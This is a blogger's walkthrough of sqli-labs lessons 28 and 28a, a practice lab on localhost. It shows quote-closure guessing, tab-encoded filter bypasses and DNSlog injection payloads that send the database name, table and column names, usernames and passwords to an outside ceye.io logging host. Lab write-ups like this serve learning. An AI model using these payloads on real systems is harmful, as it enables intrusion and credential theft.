SQLi-28,28a

28

Error based_GET_UNION/SELECT filtered_single quote_parentheses_string type_blind injection*

http://127.0.0.1/sqli-labs/Less-28/?id=1' or '1  # the closure is already constructed.

My own way of learning: when reading other people's walkthroughs, the most important thing is to look at the underlying principle!

Getting more and more frustrated; that doesn't really mean much. Recommendation: Jianshu => the reasoning there is better; read the source code.

1'or'1

Spaces are filtered, so try order by first:

http://127.0.0.1/sqli-labs/Less-28/?id=1'%09order%09by%091%09or%09'1

Obviously the statement doesn't work,

http://127.0.0.1/sqli-labs/Less-28/?id=1'%09ununionion%09selselectect%091,2,3or%09'1  # double-writing bypass failed

1' ununionion selselectect 1,2,3or '1

Check the source code

The closure was wrong

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09order%09by%091%09or('1  #OK  => the correct closure

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09order%09by%095%09or('1    => order by has no effect

For someone without a coding background: this is the code that builds the SQL query statement,

and then the query is run here. That leaves a newbie like me with no idea where to start. and updatexml: I thought of this function

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09(updatexml(1,concat(0x7e,(select%09database()),0x7e),1))or('1  # this method doesn't work.

Honestly, I'm stuck too.... Being a noob is the original sin! Other people's blogs all just gloss over whatever they don't understand => straight to union

Clearly the injection can succeed, yet it failed when I tested it.

http://127.0.0.1/sqli-labs/Less-28/?id=0')%09union%09union%09select%09select%093,(updatexml(1,concat(0x7e,(select%09database()),0x7e),1)),5,database()%09or%09('2

ε=(´ο`*))) Ugh, painful. To finish this, I played with DNSlog injection once more

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09load_file(concat('\\',(select%09user()),'.reh927.ceye.io\sql'))%09or%09('1

Grinding through it; picked it up again the next day. Blind injection is so annoying

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09database()),'.reh927.ceye.io\\abc'))%09||%09('1  # database

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),'.reh927.ceye.io\\abc'))%09||%09('1  # table

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%097,1),'.reh927.ceye.io\\abc'))%09||%09('1  # column username

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # column password

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09username%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # username data: stupid

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09password%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # password data: stupidity

28a

The closure ') is the same as in 28

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09database()),'.reh927.ceye.io\\abc'))%09||%09('1  # database

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),'.reh927.ceye.io\\abc'))%09||%09('1  # table

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%097,1),'.reh927.ceye.io\\abc'))%09||%09('1  # column username

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # column password

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09username%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # username data: stupid

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09password%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  # password data: stupidity

posted @ 2020-04-29 12:51  llcnKill  Reads (267)  Comments (0)